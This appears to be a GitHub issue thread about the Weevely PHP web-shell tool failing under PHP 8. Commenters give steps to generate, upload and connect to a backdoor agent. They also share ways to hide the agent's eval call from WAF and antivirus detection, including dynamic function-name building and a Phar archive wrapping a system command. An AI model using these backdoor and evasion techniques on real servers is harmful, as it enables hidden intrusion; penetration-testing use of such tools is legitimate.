lazypip
commented
3 years ago I got the same problem only with PHP 8th. So I think there may be several measures applied in the newest PHP version.
Closed dvanmosselbeen closed 1 year ago
lazypip
commented
3 years ago I got the same problem only with PHP 8th. So I think there may be several measures applied in the newest PHP version.
epinna
commented
3 years ago I confirm that PHP 8 removed create_function, breaking the PHP agent.
Ghazavizade
commented
2 years ago Hi there I try it on last version of kali and php 7.3 but I still have this problem but fortunately the shell completely works fine,problem is that this error is so annoying Why this happenes exactly ? is there any quick fix or complete fix for this issue?
LachlanArthur
commented
2 years ago To generate an agent that works with PHP 8+:
Run the generate command with the flag -obfuscator cleartext1_php to disable the agent obfuscation (this is the only place that create_function is used).
Change a line in the agent to swap curly braces to square ones:
...
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++)
{
- $o.=$t{$i}^$k{$j};
+ $o.=$t[$i]^$k[$j];
}
}
...
0bskure
commented
2 years ago I confirm that PHP 8 removed
create_function, breaking the PHP agent.
call_user_func still exists and works generally the same as create_function did
on an unrelated note, the function names in the php agent can be generated dynamically while still somewhat obfuscated by building them with static values returned by php functions such as the array keys for get_defined_constants
example with eval
`<?php // this should return 'eval' on most php versions,
$func = strtolower(array_keys(get_defined_constants())[1]); print($func[0].$func[6].$func[9].$func[11]); `
there are enough static values located in the same indexes returned from get_defined_constants across most php versions to extend further with other function names
epinna
commented
2 years ago The purpose of create_function was to execute in-memory PHP code from a dynamic string without leaving visible eval()s in the code. From a quick glance, it does not seem is possible to do the same with call_user_func.
archidote
commented
2 years ago I got the same error as you all. :/
nickylivardo
commented
2 years ago To generate an agent that works with PHP 8+:
Run the generate command with the flag
-obfuscator cleartext1_phpto disable the agent obfuscation (this is the only place thatcreate_functionis used).Change a line in the agent to swap curly braces to square ones:
... for($i=0;$i<$l;){ for($j=0;($j<$c&&$i<$l);$j++,$i++) { - $o.=$t{$i}^$k{$j}; + $o.=$t[$i]^$k[$j]; } } ...
it works, thanks
archidote
commented
2 years ago Hello @nickylivardo,
Thank's for you answer ! it succefully works !
Below, it's a step by step tutorial :
weevely generate -obfuscator cleartext1_php 123 file.php
nano file.php
...
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++)
{
- $o.=$t{$i}^$k{$j};
+ $o.=$t[$i]^$k[$j];
}
}
...
weevely http://localhost/file.php 123
++
Archidote
PawelklosPL
commented
1 year ago @archidote @nickylivardo, thx for the answer. For future generations:
This problem still exists in Weevely: 4.0.1 PHP Version: 8.2.2 System: Kali linux
ZanyMonk
commented
1 year ago The obfpost_php.tpl template is pretty easy to fix, as shown above.
But I feel like there is no alternative to the now defunct create_function : the only alternative would be eval, but the purpose of this obfuscator is to hide the eval call to an eventual WAF/AV in the first place, so using this function to start the deobfuscation process seems odd, if not useless.
We cannot call it from a string (ie. $f = "ev"."al"; $f("...");) because eval is a language construct, not a function.
Does anyone have an idea to save this obfuscator from obsolescence ?
Edit: assert could have been a good candidate but it does not evaluate string arguments since 8.0.0, so it's not usable.
Edit 2: it may be possible to use a (compressed) Phar archive to mangle the eval call.
Phar support is enabled by default according to PHP documentation.
It works with allow_url_include = Off.
<?php
$a = new Phar('x.phar');
$a->startBuffering();
$a->addFromString('index.php', "<?php\neval('system(\"id\");');"); // This gets compressed
$a->setStub('<?php
include "phar://".basename(__FILE__)."/index.php";
__HALT_COMPILER();
');
$a->stopBuffering();
$a->compressFiles(Phar::GZ);I created a PR to fix the agent and add a phar obfuscator.
aatif007
commented
4 weeks ago ![Uploading 2024-10-16 18_55_05-Kali Machine [Running] - Oracle VirtualBox.png…]() thx for the answer. For future generations:
This problem still exists in Weevely: 4.0.1 PHP Version: 8.2.2 System: Kali linux
@ZanyMonk please help me.
please help me i am stuck at last 3 days @LachlanArthur @PawelklosPL @dvanmosselbeen @ZanyMonk @epinna
Hi there,
After generating the PHP backdoor, uploading it and then connecting to it; I get the following non-blocking error message when the shell connect:
However, it seems to work as expected. Tried several times and this error still pop up. Following some course online and saw other people have that same error. So I was thinking this is maybe a little bug.
Using version 4.0.1-1 from the latest and up to date Kali distribution.
Kind regards & thanks for this sweet tool